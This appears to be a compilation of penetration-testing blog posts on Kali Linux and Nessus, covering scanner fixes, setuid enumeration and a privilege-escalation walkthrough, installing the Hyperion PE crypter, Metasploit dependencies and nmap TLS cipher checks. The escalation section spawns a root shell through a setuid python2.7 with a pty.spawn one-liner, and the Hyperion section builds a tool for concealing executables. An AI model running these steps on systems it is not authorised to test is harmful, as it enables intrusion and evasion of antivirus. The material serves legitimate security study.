Nessus has detected that API access on this scanner is disabled.

Nessus displays warning “Nessus has detected that API access on this scanner is disabled” during usage.

To fix this, stop the Nessus service, reset its configuration, start it again and re-register it with your existing activation code (the reset clears the registration along with the other settings, which is why the last step is needed).

1. Stop the Nessus service:
service nessusd stop

2. Reset the configuration:
/opt/nessus/sbin/nessuscli fix --reset

3. Start the Nessus service:
service nessusd start

4. Register Nessus using your previous activation code:
/opt/nessus/sbin/nessuscli fetch --register xxxx-xxxx-xxxx-xxxx-xxxx

5. Log in to Nessus and update the plugins.

Searching for binaries for privilege escalation exploit

Once a shell has been obtained during the attack phase of a penetration test, the next goal is usually a privilege escalation to root. First check who we are: id prints the real and effective user and group IDs of the current process, so a plain uid/gid with no separate euid field means we are running as an ordinary user:

$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)

Then list the executables on the system that have the setuid bit set, since these run with the privileges of their owner (root, for most of them) rather than ours:

find / -perm -u=s -type f 2>/dev/null

Here find searches from the root of the filesystem (/) for files that have the setuid bit set for their owner (-perm -u=s) and are regular files (-type f). The 2>/dev/null part redirects standard error to the null device, which hides the Permission denied messages find prints for directories our user cannot read; the matching paths still go to standard output.

Example shown below (this run omits -type f, so directories with the bit set would also appear; none did). Most of these are the setuid helpers a default Debian-based install ships with, such as passwd, su, mount and gpasswd. The entries that stand out are the interpreters, /usr/bin/python2.7 and /usr/bin/mawk, because an interpreter with the setuid bit will run whatever code it is given as root:

$ find / -perm -u=s 2>/dev/null
/sbin/mount.nfs
/usr/sbin/exim4
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/python2.7
/usr/bin/chsh
/usr/bin/at
/usr/bin/mawk
/usr/bin/chfn
/usr/bin/procmail
/usr/bin/passwd
/bin/su
/bin/umount
/bin/mount

Note that if we had redirected standard output instead (> /dev/null or 1> /dev/null), we would have thrown away the results and been left with only the Permission denied errors. From the list above, /usr/bin/python2.7 is the obvious candidate: a setuid-root interpreter executes any code we hand it with root's effective privileges, so no separate exploit is needed. We can use it to spawn a shell:

/usr/bin/python2.7 -c 'import pty;pty.spawn("/bin/sh")'

pty.spawn starts /bin/sh on a pseudo-terminal (the same call commonly used to upgrade a bare reverse shell to a proper TTY). The point here is that python2.7 is setuid root, so it runs with an effective UID of 0, and the shell it spawns inherits that. This works with Debian's /bin/sh (dash); bash would drop the effective UID back to the real UID at startup unless invoked with -p. The result is visible from the following commands:

# id
uid=1000(user) gid=1000(user) euid=0(root) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)
# whoami
root

The user now has root's effective privileges: id shows euid=0(root) while the real uid is still 1000, and whoami reports the effective user, so it prints root.
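As an added example that is not part of the original post, the following shell functions wrap the find command above into a small triage: list every setuid/setgid regular file, drop those that are expected on the distribution, and pull out interpreters, which are the immediately usable ones because they execute arbitrary code as the file owner. The baseline file of expected paths is an assumption; build it from a known-good host of the same release.

```shell
#!/bin/sh
# Added example, not from the original post.
# Enumerate setuid/setgid files and triage them. Assumes a baseline file of
# absolute paths that are normal on the distribution (one per line), built by
# the reader from a known-good host of the same release.

suid_files() {
    # $1: directory to search. -perm -4000 matches the setuid bit and
    # -perm -2000 the setgid bit (either is interesting); -type f restricts
    # the search to regular files; 2>/dev/null discards the "Permission denied"
    # lines find writes to stderr for directories an unprivileged user cannot read.
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null | sort
}

unexpected_suid() {
    # $1: directory to search, $2: baseline file. Prints setuid/setgid files
    # that are not listed in the baseline (exact whole-line matches only).
    # Exit status is 1 when nothing unexpected is found, like grep.
    suid_files "$1" | grep -v -x -F -f "$2"
}

interpreter_suid() {
    # $1: directory to search. Prints setuid/setgid files whose name is an
    # interpreter; these run arbitrary code with the owner's privileges and
    # need no further vulnerability (python2.7 and mawk in the list above).
    suid_files "$1" | grep -E '/(python[0-9.]*|perl|ruby|lua|[mg]?awk|sh|bash|dash)$'
}

# Usage on a live host (output depends on the system):
#   suid_files /
#   unexpected_suid / /tmp/suid-baseline.txt
#   interpreter_suid /
```

The baseline comparison is the same check a file-integrity monitor performs from the defensive side: a new setuid binary on a host, or a setuid bit on an interpreter, is worth an alert rather than a shrug.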

Fix “Could not validate this preference file” in Nessus

If you receive the error below when downloading the latest Nessus plugin updates, the following fix may help:

/opt/nessus/sbin/nessuscli update --plugins-only

----- Fetching the newest updates from nessus.org -----

Could not validate this preference file. Have installation files been copied from another system?
Nessus Plugins: Failed

The first step to fix the error is to request a new activation code from Tenable for Nessus: Link.

Then register the new activation code that Tenable emails you so that it is associated with this scanner:
/opt/nessus/sbin/nessuscli fetch --register xxxx-xxxx-xxxx-xxxx-xxxx

Alien Vault – How to Prepare to Take the OSCP

Offensive Security Certified Professional (OSCP) – one of the most recognized penetration testing certifications in the industry.

  1. Earned after passing the 24-hour, performance-based exam
  2. Prerequisite course: Penetration Testing with Kali Linux (PWK)
  3. The certification shows a clear and practical understanding of the penetration testing process and life cycle
  4. The lab is a virtual network containing targets of varying configurations and operating systems
  5. An OSCP is able to identify vulnerabilities and execute attacks in a controlled and focused manner.

Alien Vault – How to Prepare to Take the OSCP: Link

How to install Hyperion in Linux

Hyperion is a runtime encrypter for 32-bit portable executables. It is a reference implementation based on the paper “Hyperion: Implementation of a PE-Crypter”.

Hyperion is not included in the Kali Linux repositories. To install Hyperion on Linux, run the following commands (the MinGW cross-compiler from the next section must already be installed):

Download the files from Github:
wget https://github.com/nullsecuritynet/tools/raw/master/binary/hyperion/release/Hyperion-1.2.zip

Unzip the archive file:
unzip Hyperion-1.2.zip

Invoke the MinGW cross-compiler to build Hyperion into an executable. The result is a Windows PE file, so on Linux it is run under Wine:
i686-w64-mingw32-c++ Hyperion-1.2/Src/Crypter/*.cpp -o hyperion.exe

How to install the MinGW C compiler in Linux

MinGW, a contraction of “Minimalist GNU for Windows”, is a minimalist development environment for native Microsoft Windows applications.

MinGW provides a complete Open Source programming tool set which is suitable for the development of native MS-Windows applications, and which do not depend on any 3rd-party C-Runtime DLLs. (It does depend on a number of DLLs provided by Microsoft themselves, as components of the operating system; most notable among these is MSVCRT.DLL, the Microsoft C runtime library. Additionally, threaded applications must ship with a freely distributable thread support DLL, provided as part of MinGW itself).

The MinGW-w64 compiler is in the Kali Linux repositories but is not installed by default. To install it, run the following command:

apt-get install mingw-w64

mingw-w64 is the actively maintained fork of the original mingw32 project and provides both 32-bit (i686-w64-mingw32-*) and 64-bit (x86_64-w64-mingw32-*) cross-compilers; the Hyperion build above uses the 32-bit one.

Kali Linux: Ruby Gem Bundler Errors (Ruby libraries) for Metasploit

An error occurred while installing pcaprub (0.12.4), and Bundler cannot
continue.
Make sure that `gem install pcaprub -v '0.12.4'` succeeds before bundling.

This occurs when installing Metasploit's bundled gems from a local Git checkout, e.g.:

cd ~/git/metasploit-framework/
bundle install

Note: ~/git/metasploit-framework/ is my locally defined directory for my GitHub repository in Kali Linux.

In the example above, the error affects the pcaprub gem, whose native extension needs the libpcap headers to build. To fix this, run the following command:

sudo apt-get install libpcap-dev

This installs libpcap-dev, the development headers for libpcap – libpcap-dev Debian package

Once the libpcap-dev package has been installed, the bundle install command can be run again:

cd ~/git/metasploit-framework/
bundle install

Note: other gem errors during bundle install are usually the same kind of problem, a native extension that cannot build because a system development package is missing. Install the missing package with sudo apt-get install [package_name] and rerun bundle install.

Adding a new user in Kali Linux

Open a terminal using Ctrl+Alt+T or by clicking the terminal icon; Kali logs in as root by default, which the # prompt below reflects. Replace <username> with the account you are creating.

From the console, issue the useradd command with “-m” to create the user's home directory – # useradd -m <username>

Set a password for the user – # passwd <username>

Add the user to the sudo group (“-a” appends, so the user's existing groups are kept) – # usermod -a -G sudo <username>

Change the user's default login shell to bash – # chsh -s /bin/bash <username>

Initiate SSLv3/TLS Connections with Nmap Script

Locate the Nmap scripts folder (the location varies by platform; on Kali it is /usr/share/nmap/scripts, or search with find / -name '*.nse').

Confirm that ssl-enum-ciphers.nse exists in that folder. It ships with Nmap; if it is missing, download it from https://nmap.org/nsedoc/scripts/ssl-enum-ciphers.html

Invoke Nmap with the script – nmap -p 80,443 -T4 --script ssl-enum-ciphers <hostname>. The script only reports on ports where it can complete an SSL/TLS handshake, so expect output for 443 and nothing for plain-HTTP port 80. For each protocol version the server accepts it lists the cipher suites offered, grades each one from A to F, attaches warnings for known-weak constructions, and finishes with a “least strength” summary line.
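As an added example that is not part of the original post, here is a small shell helper that reads the normal output of the ssl-enum-ciphers script and pulls out what a tester acts on: which protocol versions the server accepted, every cipher graded below a chosen letter, and the warnings the script attached. The sample scan output embedded below is constructed to match the script's normal-output layout; it is not from a real host.

```shell
#!/bin/sh
# Added example, not from the original post. Parses the normal output of
# nmap's ssl-enum-ciphers script, read from standard input.
# SAMPLE is constructed to match the script's layout, not a real scan.

SAMPLE='PORT    STATE SERVICE
443/tcp open  https
| ssl-enum-ciphers:
|   SSLv3:
|     ciphers:
|       TLS_RSA_WITH_3DES_EDE_CBC_SHA (rsa 2048) - C
|       TLS_RSA_WITH_RC4_128_SHA (rsa 2048) - C
|     compressors:
|       NULL
|     cipher preference: server
|     warnings:
|       64-bit block cipher 3DES vulnerable to SWEET32 attack
|       Broken cipher RC4 is deprecated by RFC 7465
|   TLSv1.2:
|     ciphers:
|       TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 (secp256r1) - A
|       TLS_RSA_WITH_AES_128_CBC_SHA (rsa 2048) - A
|       TLS_RSA_WITH_3DES_EDE_CBC_SHA (rsa 2048) - C
|     compressors:
|       NULL
|     cipher preference: server
|     warnings:
|       64-bit block cipher 3DES vulnerable to SWEET32 attack
|_  least strength: C'

tls_protocols() {
    # Protocol versions the server completed a handshake for, one per line.
    # Protocol headers sit at three spaces of indentation after the "|".
    awk '/^\|   (SSLv3|TLSv1\.[0-9]):/ { sub(/:$/, "", $2); print $2 }'
}

weak_ciphers() {
    # $1: lowest acceptable grade (A-F). Prints "protocol cipher grade" for
    # every cipher graded worse than $1. Grades are single letters, so a
    # plain string comparison orders them: a later letter is a weaker cipher.
    awk -v min="$1" '
        /^\|   (SSLv3|TLSv1\.[0-9]):/ { proto = $2; sub(/:$/, "", proto) }
        /^\|       TLS_.* - [A-F]$/   { if ($NF > min) print proto, $2, $NF }
    '
}

tls_warnings() {
    # Distinct warnings the script attached, without the "|" indentation.
    # A warnings block ends at the first line that is not indented seven spaces.
    awk '
        /^\|     warnings:/          { inwarn = 1; next }
        inwarn && !/^\|       /     { inwarn = 0 }
        inwarn                      { sub(/^\|       /, ""); print }
    ' | sort -u
}

# Usage against a live target (assumed host name and output file):
#   nmap -p 443 --script ssl-enum-ciphers -oN scan.txt <hostname>
#   tls_protocols < scan.txt
#   weak_ciphers B < scan.txt
#   tls_warnings < scan.txt
```

Grading below B with weak_ciphers B is a reasonable first cut: the script reserves C and worse for suites with export-grade, RC4, 3DES or similar weaknesses, and any SSLv3 line from tls_protocols is a finding on its own regardless of the ciphers behind it.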